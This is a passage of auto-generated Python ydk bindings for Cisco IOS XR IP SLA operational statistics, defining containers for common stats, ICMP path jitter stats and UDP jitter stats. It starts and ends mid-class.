        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.update_count = None
        self.ok_count = None
        self.disconnect_count = None
        self.timeout_count = None
        self.busy_count = None
        self.no_connection_count = None
        self.dropped_count = None
        self.internal_error_count = None
        self.sequence_error_count = None
        self.verify_error_count = None
        # Unkeyed container: a fixed XPath segment.
        self._segment_path = lambda: "common-stats"

    def __setattr__(self, name, value):
        # Route writes through the Entity machinery, restricting tracked
        # data attributes to the declared leaf names.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
    """
    Operation Specific Stats

    .. attribute:: icmp_path_jitter_stats
    	icmp path jitter stats
    	**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats>`
    .. attribute:: udp_jitter_stats
    	udp jitter stats
    	**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats>`
    .. attribute:: op_type
    	op type
    	**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
    """

    # YANG module metadata for this generated binding.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Initialize the ``specific-stats`` container.

        Registers the ``op-type`` discriminator leaf plus both
        operation-specific child containers; both children are always
        instantiated (the op-type presumably indicates which one carries
        data — not verifiable from this binding alone).
        """
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats, self).__init__()
        self.yang_name = "specific-stats"
        self.yang_parent_name = "distribution-interval"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Map YANG container names -> (python attribute name, binding class).
        self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('op_type', YLeaf(YType.enumeration, 'op-type')),
        ])
        self.op_type = None
        self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats()
        self.icmp_path_jitter_stats.parent = self
        self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
        self._children_yang_names.add("icmp-path-jitter-stats")
        self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats()
        self.udp_jitter_stats.parent = self
        self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
        self._children_yang_names.add("udp-jitter-stats")
        self._segment_path = lambda: "specific-stats"

    def __setattr__(self, name, value):
        # Only 'op_type' is a tracked data leaf on this container.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats, ['op_type'], name, value)

    class IcmpPathJitterStats(Entity):
        """
        icmp path jitter stats

        .. attribute:: source_address
        	IP Address of the source
        	**type**\: str
        	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: dest_address
        	IP Address of the destination
        	**type**\: str
        	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: hop_address
        	IP address of the hop in the path
        	**type**\: str
        	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: packet_interval
        	Interval between echos in ms
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: response_time_count
        	Number of RTT samples used for the statistics
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: response_time
        	RTT
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: min_response_time
        	Minimum RTT
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: max_response_time
        	Maximum RTT
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: sum_response_time
        	Sum of RTT
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: sum2_response_time
        	Sum of RTT^2
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: packet_count
        	Number of Echo replies received
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_loss_count
        	Number of packets lost
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: out_of_sequence_count
        	Number of out of sequence packets
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: discarded_sample_count
        	Number of discarded samples
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: verify_errors_count
        	Number of packets with data corruption
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: dropped_error_count
        	Number of packets dropped
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: jitter
        	Jitter value for this node in the path
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: pos_jitter_sum
        	Sum of positive jitter value
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: pos_jitter_sum2
        	Sum of squares of positive jitter values
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: pos_jitter_min
        	Minimum positive jitter value
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: pos_jitter_max
        	Maximum positive jitter value
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: pos_jitter_count
        	Number of positive jitter values
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: neg_jitter_sum
        	Sum of negative jitter values
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: neg_jitter_min
        	Minimum negative jitter value
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: neg_jitter_max
        	Maximum negative jitter value
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: neg_jitter_sum2
        	Sum of squares of negative jitter values
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: neg_jitter_count
        	Number of negative jitter values
        	**type**\: int
        	**range:** 0..4294967295
        """

        # YANG module metadata for this generated binding.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            """Initialize the ``icmp-path-jitter-stats`` leaf-only container
            and default every leaf value to None."""
            super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, self).__init__()
            self.yang_name = "icmp-path-jitter-stats"
            self.yang_parent_name = "specific-stats"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([])
            self._child_list_classes = OrderedDict([])
            # Leaf registry; OrderedDict preserves the YANG model's leaf order.
            self._leafs = OrderedDict([
                ('source_address', YLeaf(YType.str, 'source-address')),
                ('dest_address', YLeaf(YType.str, 'dest-address')),
                ('hop_address', YLeaf(YType.str, 'hop-address')),
                ('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
                ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
                ('response_time', YLeaf(YType.uint32, 'response-time')),
                ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
                ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
                ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
                ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
                ('packet_count', YLeaf(YType.uint32, 'packet-count')),
                ('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
                ('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
                ('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
                ('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
                ('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
                ('jitter', YLeaf(YType.uint32, 'jitter')),
                ('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
                ('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
                ('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
                ('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
                ('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
                ('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
                ('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
                ('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
                ('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
                ('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
            ])
            # Leaf values start unset; writes are intercepted by __setattr__.
            self.source_address = None
            self.dest_address = None
            self.hop_address = None
            self.packet_interval = None
            self.response_time_count = None
            self.response_time = None
            self.min_response_time = None
            self.max_response_time = None
            self.sum_response_time = None
            self.sum2_response_time = None
            self.packet_count = None
            self.packet_loss_count = None
            self.out_of_sequence_count = None
            self.discarded_sample_count = None
            self.verify_errors_count = None
            self.dropped_error_count = None
            self.jitter = None
            self.pos_jitter_sum = None
            self.pos_jitter_sum2 = None
            self.pos_jitter_min = None
            self.pos_jitter_max = None
            self.pos_jitter_count = None
            self.neg_jitter_sum = None
            self.neg_jitter_min = None
            self.neg_jitter_max = None
            self.neg_jitter_sum2 = None
            self.neg_jitter_count = None
            self._segment_path = lambda: "icmp-path-jitter-stats"

        def __setattr__(self, name, value):
            # Route writes through the Entity machinery, restricting tracked
            # data attributes to the declared leaf names.
            self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)

    class UdpJitterStats(Entity):
        """
        udp jitter stats

        .. attribute:: jitter_in
        	Input Jitter moving average, computed as per RFC1889
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: jitter_out
        	Output Jitter moving average, computed as per RFC1889
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_loss_sd
        	Packets lost in source to destination (SD) direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_loss_ds
        	Packets lost in destination to source (DS) direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_out_of_sequence
        	Packets out of sequence
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_mia
        	Packets missing in action (cannot determine if theywere lost in SD or DS direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_skipped
        	Packets which are skipped
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_late_arrivals
        	Packets arriving late
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: packet_invalid_tstamp
        	Packets with bad timestamps
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: internal_errors_count
        	Number of internal errors
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: busies_count
        	Number of busies
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: positive_sd_sum
        	Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
        	**type**\: int
        	**range:** 0..4294967295
        	**units**\: millisecond
        .. attribute:: positive_sd_sum2
        	Sum of squares of positive jitter values in SD direction
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: positive_sd_min
        	Minimum of positive jitter values in SD direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: positive_sd_max
        	Maximum of positive jitter values in SD direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: positive_sd_count
        	Number of positive jitter values in SD direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: negative_sd_sum
        	Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
        	**type**\: int
        	**range:** 0..4294967295
        	**units**\: millisecond
        .. attribute:: negative_sd_sum2
        	Sum of squares of negative jitter values in SD direction
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: negative_sd_min
        	Minimum of negative jitter values in SD direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: negative_sd_max
        	Maximum of negative jitter values in SD direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: negative_sd_count
        	Number of negative jitter values in SD direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: positive_ds_sum
        	Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
        	**type**\: int
        	**range:** 0..4294967295
        	**units**\: millisecond
        .. attribute:: positive_ds_sum2
        	Sum of squares of positive jitter values in DS direction
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: positive_ds_min
        	Minimum of positive jitter values in DS direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: positive_ds_max
        	Maximum of positive jitter values in DS direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: positive_ds_count
        	Number of positive jitter values in DS direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: negative_ds_sum
        	Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
        	**type**\: int
        	**range:** 0..4294967295
        	**units**\: millisecond
        .. attribute:: negative_ds_sum2
        	Sum of squares of negative jitter values in DS direction
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: negative_ds_min
        	Minimum of negative jitter values in DS direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: negative_ds_max
        	Maximum of negative jitter values in DS direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: negative_ds_count
        	Number of negative jitter values in DS direction
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_count
        	Number of probe/probe\-response pairs used to compute one\-way statistics
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_sd_min
        	Minimum of one\-way jitter values in SD direction (msec)
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_sd_max
        	Maximum of one\-way jitter values in SD direction (msec)
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_sd_sum
        	Sum of one\-way jitter values in SD direction (msec)
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_sd_sum2
        	Sum of squares of one\-way jitter values in SD direction (msec)
        	**type**\: int
        	**range:** 0..18446744073709551615
        .. attribute:: one_way_ds_min
        	Minimum of one\-way jitter values in DS direction (msec)
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_ds_max
        	Maximum of one\-way jitter values in DS direction (msec)
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_ds_sum
        	Sum of one\-way jitter values in DS direction (msec)
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: one_way_ds_sum2
        	Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
        	**type**\: int
        	**range:** 0..18446744073709551615
        """

        # YANG module metadata for this generated binding.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            """Initialize the ``udp-jitter-stats`` leaf-only container
            and default every leaf value to None."""
            super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, self).__init__()
            self.yang_name = "udp-jitter-stats"
            self.yang_parent_name = "specific-stats"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([])
            self._child_list_classes = OrderedDict([])
            # Leaf registry; OrderedDict preserves the YANG model's leaf order.
            self._leafs = OrderedDict([
                ('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
                ('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
                ('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
                ('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
                ('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
                ('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
                ('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
                ('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
                ('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
                ('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
                ('busies_count', YLeaf(YType.uint32, 'busies-count')),
                ('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
                ('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
                ('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
                ('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
                ('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
                ('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
                ('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
                ('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
                ('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
                ('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
                ('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
                ('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
                ('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
                ('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
                ('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
                ('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
                ('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
                ('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
                ('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
                ('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
                ('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
                ('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
                ('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
                ('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
                ('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
                ('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
                ('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
                ('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
                ('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
            ])
            # Leaf values start unset; writes are intercepted by __setattr__.
            self.jitter_in = None
            self.jitter_out = None
            self.packet_loss_sd = None
            self.packet_loss_ds = None
            self.packet_out_of_sequence = None
            self.packet_mia = None
            self.packet_skipped = None
            self.packet_late_arrivals = None
            self.packet_invalid_tstamp = None
            self.internal_errors_count = None
            self.busies_count = None
            self.positive_sd_sum = None
            self.positive_sd_sum2 = None
            self.positive_sd_min = None
            self.positive_sd_max = None
            self.positive_sd_count = None
            self.negative_sd_sum = None
            self.negative_sd_sum2 = None
            self.negative_sd_min = None
            self.negative_sd_max = None
            self.negative_sd_count = None
            self.positive_ds_sum = None
            self.positive_ds_sum2 = None
            self.positive_ds_min = None
            self.positive_ds_max = None
            self.positive_ds_count = None
            self.negative_ds_sum = None
            self.negative_ds_sum2 = None
            self.negative_ds_min = None
            self.negative_ds_max = None
            self.negative_ds_count = None
            self.one_way_count = None
            self.one_way_sd_min = None
            self.one_way_sd_max = None
            self.one_way_sd_sum = None
            self.one_way_sd_sum2 = None
            self.one_way_ds_min = None
            self.one_way_ds_max = None
            self.one_way_ds_sum = None
            self.one_way_ds_sum2 = None
            self._segment_path = lambda: "udp-jitter-stats"

        def __setattr__(self, name, value):
            # Route writes through the Entity machinery, restricting tracked
            # data attributes to the declared leaf names.
            self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class NonDistributed(Entity):
"""
Statistics aggregated for the total range
of values in 1\-hour intervals
.. attribute:: target
Total 1\-hour aggregated statistics for the target node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target>`
.. attribute:: paths
Table of paths identified in the 1\-hour interval
**type**\: :py:class:`Paths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths>`
.. attribute:: lpd_paths
List of latest LPD paths
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the ``non-distributed`` container.

    Registers and eagerly instantiates its three child containers
    (``target``, ``paths``, ``lpd-paths``), wiring each child's
    ``parent`` back-reference; this container has no leaves of its own.
    """
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed, self).__init__()
    self.yang_name = "non-distributed"
    self.yang_parent_name = "hour"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Map YANG container names -> (python attribute name, binding class).
    self._child_container_classes = OrderedDict([("target", ("target", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target)), ("paths", ("paths", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths)), ("lpd-paths", ("lpd_paths", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths))])
    self._child_list_classes = OrderedDict([])
    # No leaves on this container.
    self._leafs = OrderedDict()
    self.target = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target()
    self.target.parent = self
    self._children_name_map["target"] = "target"
    self._children_yang_names.add("target")
    self.paths = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths()
    self.paths.parent = self
    self._children_name_map["paths"] = "paths"
    self._children_yang_names.add("paths")
    self.lpd_paths = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths()
    self.lpd_paths.parent = self
    self._children_name_map["lpd_paths"] = "lpd-paths"
    self._children_yang_names.add("lpd-paths")
    self._segment_path = lambda: "non-distributed"
class Target(Entity):
"""
Total 1\-hour aggregated statistics for
the target node
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the ``target`` container of ``non-distributed``.

    Registers and eagerly instantiates its two child containers
    (``common-stats`` and ``specific-stats``), wiring each child's
    ``parent`` back-reference; this container has no leaves of its own.
    """
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target, self).__init__()
    self.yang_name = "target"
    self.yang_parent_name = "non-distributed"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Map YANG container names -> (python attribute name, binding class).
    self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats))])
    self._child_list_classes = OrderedDict([])
    # No leaves on this container.
    self._leafs = OrderedDict()
    self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats()
    self.common_stats.parent = self
    self._children_name_map["common_stats"] = "common-stats"
    self._children_yang_names.add("common-stats")
    self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats()
    self.specific_stats.parent = self
    self._children_name_map["specific_stats"] = "specific-stats"
    self._children_yang_names.add("specific-stats")
    self._segment_path = lambda: "target"
class CommonStats(Entity):
    """
    Common Stats
    .. attribute:: operation_time
    Operation Time
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: return_code
    Return code
    **type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
    .. attribute:: response_time_count
    Number of RTT samples used for the statistics
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: response_time
    RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: min_response_time
    Minimum RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: max_response_time
    Maximum RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sum_response_time
    Sum of RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sum2_response_time
    Sum of RTT^2
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: update_count
    Number of updates processed
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: ok_count
    Number of updates with Okay return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: disconnect_count
    Number of updates with Disconnected return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: timeout_count
    Number of updates with Timeout return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: busy_count
    Number of updates with Busy return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: no_connection_count
    Number of updates with NotConnected return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: dropped_count
    Number of updates with Dropped return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: internal_error_count
    Number of updates with InternalError return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sequence_error_count
    Number of updates with SeqError return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: verify_error_count
    Number of updates with VerifyError return code
    **type**\: int
    **range:** 0..4294967295
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
